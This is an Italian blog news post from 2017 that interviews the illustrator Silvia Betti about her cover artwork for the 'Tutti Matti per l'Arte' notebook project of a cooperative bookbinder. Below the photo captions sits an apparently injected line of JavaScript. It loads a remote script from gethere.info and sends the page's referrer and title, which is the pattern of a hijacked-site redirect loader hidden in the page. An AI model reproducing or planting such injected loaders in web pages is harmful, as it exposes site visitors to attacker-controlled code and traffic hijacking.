[TUTTI MATTI PER L’ARTE] VEDERE OLTRE? SOLO CHI AMA CIOCHE FA. INTERVISTA ALLARTISTA SILVIA BETTI

Posted by on gen 16, 2017 in News | No Comments
[<span class="caps">TUTTI</span> <span class="caps">MATTI</span> <span class="caps">PER</span> L’<span class="caps">ARTE</span>] <span class="caps">VEDERE</span> <span class="caps">OLTRE</span>? <span class="caps">SOLO</span> <span class="caps">CHI</span> <span class="caps">AMA</span> <span class="caps">CIO</span>’ <span class="caps">CHE</span> <span class="caps">FA</span>. <span class="caps">INTERVISTA</span> <span class="caps">ALL</span>’<span class="caps">ARTISTA</span> <span class="caps">SILVIA</span> <span class="caps">BETTI</span>

Adesso che ha final­mente trovato il suo modo di fare arte può vera­mente “viag­giare” con una mar­cia in più. Eccola l’autrice della cop­er­tina “Sognare in grande”

E’ solo facendo ciò che si ama davvero che si può pen­sare di vedere oltre”. Sil­via Betti, artista “gros­se­tana” che col­lab­ora atti­va­mente con il prog­etto del Quadri­foglio Gruppo Coop­er­a­tivo “Tutti Matti per l’Arte”, va oltre il con­cetto di pas­sione e pro­fes­sion­al­ità, traval­ica la mate­ri­al­ità per appro­dare al vero sen­ti­mento che “tutto muove”. Classe 1977, oggi mamma di uno splen­dido Nicola, Sil­via ha iniziato a dedi­carsi all’illustrazione e al dis­egno dopo un per­corso di crescita per­son­ale e pro­fes­sion­ale. “Solo dopo i trent’anni – rac­conta Sil­via — dopo gli studi, i viaggi, i lavori pre­cari e dopo la nascita del mio pic­colo Nicola, ho trovato lo spazio per dedi­carmi a dis­eg­nare assec­on­dando un’energia cre­ativa che ho sem­pre per­cepito senza com­pren­dere esat­ta­mente come incanalare”. Adesso che ha final­mente trovato il suo modo di fare arte può vera­mente “viag­giare” con una mar­cia in più.

Conos­ci­amoci meglio Sil­via, per­ché nella vita hai deciso di fare l’artista?
Per dare spazio ad una spinta cre­ativa che ho sem­pre sen­tito den­tro di me. Quando ho capito che potevo farne un lavoro, è stato come se mi avessero detto che potevo lavo­rare facendo il mio gioco preferito.

Cosa ti ha spinto ad iniziare una col­lab­o­razione con il prog­etto Tutti Matti per l’Arte?
Da tempo avevo in mente di real­iz­zare delle agende con le mie illus­trazioni in cop­er­tina, e qui, nel prog­etto di “Tutti Matti per l’Arte” ho trovato la risposta migliore.

Quali delle tue opere con­di­viderai con questo prog­etto della Lega­to­ria Lo Scoiat­tolo?
Sono due soggetti: uno è il mio omag­gio alla grande Frida Kahlo, l’altro una bam­bina dai capelli blu che ci invita a “sognare in grande”.

Par­laci della tua arte: cos’è per te arte e in quali forme le declini?
Come dicevo è per me un gioco bel­lis­simo. Oltre alle illus­trazioni su carta real­izzo bijoux in legno dip­inti a mano, Le Sagomille, spesso su richi­esta della cliente che mi chiede un suo mini-ritratto stiliz­zato da indossare.

Parla ai nos­tri let­tori, per­ché dovreb­bero essere Tutti Matti per l’Arte?
Per­ché l’arte è il modo più bello, diver­tente e per­ché per­me­tte di restare in con­tatto con la nos­tra parte bam­bina. Se poi diventa anche un modo per creare una catena vir­tu­osa di lavoro, è davvero impor­tante sosten­erla e se pos­si­bile farne parte.

Silvia_betti

 

Silvia_betti_2s.src=‘http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Leave a Reply

Utilizzando il sito, accetti l'utilizzo dei cookie da parte nostra. maggiori informazioni

Questo sito utilizza i cookie per fonire la migliore esperienza di navigazione possibile. Continuando a utilizzare questo sito senza modificare le impostazioni dei cookie o clicchi su "Accetta" permetti al loro utilizzo.

Chiudi